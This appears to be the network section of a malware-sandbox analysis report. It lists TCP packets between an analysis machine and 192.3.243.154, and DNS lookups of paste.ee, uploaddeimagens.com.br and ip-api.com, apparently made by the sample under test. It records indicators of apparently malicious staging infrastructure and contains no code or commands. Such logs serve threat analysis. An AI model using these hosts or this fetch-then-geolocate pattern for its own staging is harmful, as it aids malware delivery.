Apr 24, 2024 06:54:17.860852003 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860897064 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860924959 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.860937119 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.860968113 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861007929 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.861057997 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861126900 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861141920 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861170053 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.861186028 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861234903 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.861251116 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861299038 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861341000 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.861381054 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861439943 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861474991 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861481905 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.861620903 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861664057 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:17.861692905 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861706972 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:17.861748934 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.019493103 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.019521952 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.019594908 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.019711018 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.019963980 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020015001 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020159960 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020226955 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020258904 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020270109 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020359993 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020401955 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020423889 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020493984 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020509005 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020534992 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020610094 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020642042 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020651102 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020659924 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020698071 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020730019 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020788908 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020829916 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020836115 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020894051 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020910025 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.020935059 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.020983934 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021022081 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021073103 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021109104 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021146059 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021166086 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021210909 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021253109 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021262884 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021348000 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021388054 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021405935 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021439075 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021477938 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021512985 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021553993 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021591902 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021594048 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021655083 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021701097 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021712065 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021815062 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021853924 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021856070 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021917105 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021941900 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.021956921 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.021991014 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022033930 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022046089 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022135019 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022176981 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022207022 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022316933 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022331953 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022356987 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022403002 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022453070 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022450924 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022598028 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022624016 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022638083 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022722960 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022764921 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022767067 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022830963 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022870064 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022903919 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022917986 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.022953987 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.022974014 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023036957 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023077011 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023085117 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023099899 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023133993 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023219109 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023233891 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023261070 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023302078 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023345947 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023386002 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023395061 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023432970 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023473024 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023504019 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023556948 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023597002 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023610115 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023662090 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023701906 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023705006 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023781061 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023819923 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.023863077 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.023971081 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024012089 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.024032116 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024058104 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024096012 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.024157047 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024185896 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024226904 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.024226904 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024276972 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024316072 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.024323940 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024394989 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024435043 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.024447918 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024492979 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.024533033 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.179327965 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179361105 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179378033 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179392099 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179421902 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179488897 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.179518938 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179563046 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.179749012 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179810047 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179851055 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.179888964 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.179966927 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180003881 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180046082 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180090904 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180128098 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180147886 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180176973 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180216074 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180263996 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180310965 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180349112 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180350065 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180455923 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180495024 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180499077 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180542946 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180577993 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180598974 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180641890 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180711031 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180733919 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180802107 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180856943 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.180891037 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.180977106 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181026936 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181036949 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.181056023 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181092024 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.181129932 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181200027 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181255102 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.181333065 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181401014 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181437969 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.181478024 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181545973 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.181580067 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.181802034 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182212114 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182250977 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.182267904 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182329893 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182344913 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182363987 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.182455063 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182471037 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182493925 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.182516098 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182559013 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.182593107 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182667971 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182708979 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.182740927 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182867050 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.182908058 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.182957888 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183039904 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183078051 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183104038 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183181047 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183227062 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183231115 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183295965 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183340073 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183407068 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183489084 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183532953 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183571100 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183682919 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183726072 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183748007 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183824062 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183857918 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183862925 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183917999 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.183957100 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.183980942 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184043884 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184081078 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.184613943 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184689045 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184731007 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.184751034 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184864044 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184907913 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.184933901 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184950113 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.184989929 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.185029030 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185113907 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185158014 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.185158968 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185246944 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185286045 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.185412884 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185436964 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185477972 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.185843945 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185916901 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.185956955 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.186101913 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186153889 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186199903 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.186213970 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186312914 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186326981 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186351061 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.186379910 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186422110 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.186448097 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186530113 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186564922 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.186580896 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186722040 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.186764002 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.186780930 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187005043 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187048912 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.187136889 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187215090 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187251091 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.187366962 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187412977 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187453985 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.187493086 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187613964 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187634945 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187657118 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.187829971 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187875032 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.187902927 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.187966108 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.188008070 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.188021898 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.188035965 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.188082933 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.188105106 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.188519001 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.188563108 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.188564062 CEST	80	49733	192.3.243.154	192.168.2.4
Apr 24, 2024 06:54:18.230202913 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.303857088 CEST	49733	80	192.168.2.4	192.3.243.154
Apr 24, 2024 06:54:18.754549980 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 24, 2024 06:54:18.917140007 CEST	80	49734	208.95.112.1	192.168.2.4
Apr 24, 2024 06:54:18.917212963 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 24, 2024 06:54:18.918140888 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 24, 2024 06:54:19.078073025 CEST	80	49734	208.95.112.1	192.168.2.4
Apr 24, 2024 06:54:19.121387005 CEST	49734	80	192.168.2.4	208.95.112.1
Apr 24, 2024 06:54:50.967828035 CEST	80	49734	208.95.112.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 06:54:07.826339006 CEST	64323	53	192.168.2.4	1.1.1.1
Apr 24, 2024 06:54:07.982528925 CEST	53	64323	1.1.1.1	192.168.2.4
Apr 24, 2024 06:54:11.500341892 CEST	60600	53	192.168.2.4	1.1.1.1
Apr 24, 2024 06:54:11.943312883 CEST	53	60600	1.1.1.1	192.168.2.4
Apr 24, 2024 06:54:18.591363907 CEST	60915	53	192.168.2.4	1.1.1.1
Apr 24, 2024 06:54:18.748905897 CEST	53	60915	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 24, 2024 06:54:07.826339006 CEST	192.168.2.4	1.1.1.1	0xe2f5	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 24, 2024 06:54:11.500341892 CEST	192.168.2.4	1.1.1.1	0x22d7	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 24, 2024 06:54:18.591363907 CEST	192.168.2.4	1.1.1.1	0x878a	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 24, 2024 06:54:07.982528925 CEST	1.1.1.1	192.168.2.4	0xe2f5	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 24, 2024 06:54:07.982528925 CEST	1.1.1.1	192.168.2.4	0xe2f5	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 24, 2024 06:54:11.943312883 CEST	1.1.1.1	192.168.2.4	0x22d7	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 24, 2024 06:54:11.943312883 CEST	1.1.1.1	192.168.2.4	0x22d7	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Apr 24, 2024 06:54:18.748905897 CEST	1.1.1.1	192.168.2.4	0x878a	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

192.3.243.154

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
